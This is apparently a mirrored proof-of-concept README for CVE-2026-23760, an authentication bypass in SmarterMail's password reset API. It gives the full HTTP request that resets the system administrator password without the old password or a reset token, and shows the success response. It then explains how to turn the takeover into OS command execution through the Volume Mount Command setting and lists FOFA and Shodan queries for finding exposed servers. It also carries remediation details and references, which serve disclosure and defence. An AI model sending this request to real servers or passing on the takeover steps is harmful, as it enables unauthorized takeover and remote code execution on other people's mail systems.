## https://sploitus.com/exploit?id=6AB1A31B-2EA6-55C4-A4D6-43A5EB8881CF
# SmarterMail-CVE-2026-23760-poc
A proof-of-concept exploiting an authentication bypass via password reset API for the SmaretMail system administrator account.
# Vulnerability
The vulnerability exists due to an authentication bypass vulnerability in the password reset API. The `force-reset-password` endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts.
- System administrator account takeover.
- A direct path to remote code execution via SmarterMail built-in functionality.
# Affected Versions
- SmarterTools SmarterMail versions prior to build 9511
# Poc (by watchtowr labs)
The PoC is as simple as this:
```http
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
```
You should receive a following response, which confirms that password had been successfully modified:
```json
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
```
The only remaining requirement is knowing the username of the administrator account.
### ATO to RCE and beyond
Once authenticated as a system administrator, an attacker can:
- Navigate to `Settings -> Volume Mounts`.
- Create a new volume.
- Supply an arbitrary command in the `Volume Mount Command` field.
That command is executed by the underlying operating system. At that point, the attacker has achieved full remote code execution on the host.
https://labs.watchtowr.com/content/images/2026/01/image-17.png
When the configuration is saved, the supplied command is executed immediately.
# Automation
Nuclei-Template:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
# Into the wild
FOFA:
```
title='SmarterMail'
```
SHODAN:
```
html:'SmarterMail'
```
# Impact
An unauthenticated remote attacker can bypass authentication for the system administrator account and gain access. Once authenticated, they can complete a full remote code execution on the host.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Critical
# Remediation & Mitigation
Update to the latest version : https://www.smartertools.com/smartermail/downloads
- Build 9511 (Jan 15, 2026)
- Build 9518 (Jan 22, 2026)
# References
- [SmarterMail Release Notes](https://www.smartertools.com/smartermail/release-notes/current)
- https://nvd.nist.gov/vuln/detail/CVE-2026-23760
- [watchTowr Blog and PoC](https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/)
# Disclaimer
This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.